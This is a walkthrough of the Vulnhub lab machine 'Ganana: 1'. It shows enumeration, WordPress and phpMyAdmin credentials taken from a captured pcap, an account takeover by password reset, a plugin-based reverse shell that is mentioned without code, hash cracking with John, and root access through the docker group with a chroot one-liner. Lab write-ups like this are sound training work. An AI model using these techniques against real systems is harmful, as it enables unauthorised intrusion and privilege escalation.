This is a fairly simple machine rated easy to intermediate. There is only one flag to capture root.txt.

This is Ganana: 1 from vulnhub.


We have three open ports, and SSH is closed:

  1. 22/tcp closed ssh
  2. 80/tcp open http
  3. 443/tcp open https
  4. 6777/tcp open ntz-tracker

Although this says 6777 is ‘ntz-tracker’, a detail scan reveals it is actually FTP:

6777/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230)


It contains one file:

Hey Welcome to the ORG!!! Hope you have a wonderfull experence working with US!!!

Not helpful.


The HTTP and HTTPS versions of the site appear to be the same, so I’ll use them interchangably. There isn’t much on the front page but robots.txt has:

User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php

And the favicon.ico redirects to http://ganana/wp-includes/images/w-logo-blue-white-bg.png so we appear to have wordpress.


root@kali:/opt/vulnhub/ganana# wpscan -e --url http://ganana

This doesn’t give us much - no users, plugins, themes. I don’t try aggressive methods.


Gobuster with a basic wordlist finds lots of things:

root@kali:/opt/vulnhub/ganana# gobuster dir -u http://ganana -w /usr/share/seclists/Discovery/Web-Content/common.txt


/dashboard            (Status: 302) [Size: 0] [--> http://ganana/secret/?redirect_to=%2Fdashboard]
/embed                (Status: 301) [Size: 0] [--> http://ganana/embed/]
/favicon.ico          (Status: 302) [Size: 0] [--> http://ganana/wp-includes/images/w-logo-blue-white-bg.png]
/feed                 (Status: 301) [Size: 0] [--> http://ganana/feed/]   
/index.php            (Status: 301) [Size: 0] [--> http://ganana/]        
/license              (Status: 200) [Size: 19915]                         
/logout               (Status: 403) [Size: 2787]                          
/lostpassword         (Status: 200) [Size: 10761]  

There are some others too; including phpmyadmin - we’ll get to that later - and tasks. There is a /secret, which has the wordpress login. Trying admin:admin prompts the message:

ERROR: I hate bruteforce
2 attempt(s) left

Yikes! Better not bruteforce.


At https://ganana/tasks we find a note:

hey Jarret Lee!
Do manage the office as the admin is away for a few weeks!
Admin has created an other temp account for you and details in a pcapng file.

So we better find this file. It only takes a few moments, and we can download it:

root@kali:/opt/vulnhub/ganana# wget http://ganana/jarret.pcapng
--2020-12-22 04:47:29--  http://ganana/jarret.pcapng
Resolving ganana (ganana)...
Connecting to ganana (ganana)||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 189728 (185K)
Saving to: ‘jarret.pcapng’

jarret.pcapng                     100%[============================================================>] 185.28K  --.-KB/s    in 0.01s   

2020-12-22 04:47:29 (16.8 MB/s) - ‘jarret.pcapng’ saved [189728/189728]

I open it with wireshark and look through. Eventually I find the gold:

log=jarretlee&pwd=NoBrUtEfOrCe__R3Qu1R3d__&redirect_to=http%3A%2F%2F192.168.3.109%2Fwp-admin%2F&testcookie=1HTTP/1.1 200 OK

What can we do with this? Login to wordpress!


Jarret is not an admin :(

He does have a post though, which is called Keep dis SECRET!!!!


This decodes to:


What can we do with this? Try admin again at /secret? Nope - one try left!


We can login to phpMyAdmin as jarretlee with @lways-@-Sup3r-Secur3-p@SSw0Rd!!. Once we’re there we can find there is only one other wordpress user - charleywalker. I have a quick bash at cracking his hash, but it doesn’t work. So I just change it to the same as Jarret’s and go back to wordpress.


Charley is a wordpress admin. It turns out we have several plugins making things harder:

Loginizer: Loginizer is a WordPress plugin which helps you fight against bruteforce attack by blocking login for the IP after it reaches maximum retries allowed.

Stop User Enumeration: User enumeration is a technique used by hackers to get your login name if you are using permalinks. This plugin stops that.

WPS Hide Login: Protect your website by changing the login URL and preventing access to wp-login.php page and wp-admin directory while not logged-in

Ah well since Charley likes plugins so much we will add one of our own, to get a reverse shell bwahaha! This works, and we’re on.


We get a shell as daemon to start with,

uid=1(daemon) gid=1(daemon) groups=1(daemon)

But we can su jarretlee with his ‘no bruteforce’ password we retrieved earlier. Once we get there, he has a file called .backups, which is base64 encoded. This contains a hash:


We can throw this at John and crack it:

root@kali:/opt/vulnhub/ganana# john hash -w=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hannahmontana    (?)
1g 0:00:00:01 DONE (2020-12-22 05:21) 0.5555g/s 1422p/s 1422c/s 1422C/s skyblue..hassan
Use the "--show" option to display all of the cracked passwords reliably
Session completed


Now we can su jeevan. Jeevan doesn’t have a home directory, but he is a member of the docker group; so that’s our privesc.

jeevan@debian:/home/jarretlee$ cd ~
cd ~
bash: cd: /home/jeevan: No such file or directory
jeevan@debian:/home/jarretlee$ sudo -l
sudo -l
[sudo] password for jeevan: hannahmontana

Sorry, user jeevan may not run sudo on localhost.
jeevan@debian:/home/jarretlee$ groups
jeevan docker
jeevan@debian:/home/jarretlee$ docker run -it -v /:/mnt alpine chroot /mnt
docker run -it -v /:/mnt alpine chroot /mnt
root@8ab8e3461f42:/# cd /root
cd /root
root@8ab8e3461f42:~# ls -lash
ls -lash
total 44K
4.0K drwx------  6    600 root      4.0K Jun 25 06:43 .
4.0K drwxr-xr-x 23    600 root      4.0K Jun 25 04:55 ..
8.0K -rw-------  1 root   root      4.9K Jun 25 07:28 .bash_history
4.0K -rw-r--r--  1 root   root       796 Jun  3  2020 .bashrc
4.0K drwx------  3 root   root      4.0K Jun 25 06:43 .gnupg
4.0K drwxr-xr-x  3 root   root      4.0K Jun  6  2020 .local
4.0K -rw-r--r--  1 root   root       148 Aug 17  2015 .profile
4.0K drwxr-xr-x  3    600 jarretlee 4.0K Jun  7  2020 bitnami
   0 -rw-r--r--  1 root   root         0 Dec 22 09:23 bitnami_credentials
4.0K drwxr-xr-x  2 jeevan jeevan    4.0K Jun 16  2020 jeevan
4.0K -rw-r--r--  1 root   root       501 Jun 17  2020 root.txt
root@8ab8e3461f42:~# cat root.txt
cat root.txt

ASCII ART REMOVED, so you will have to take my word for it.


Rooted, and I didn’t even use linpeas. So yes not complicated but a few steps involved and I quite liked this one. Thumbs up Jeevana Chandra.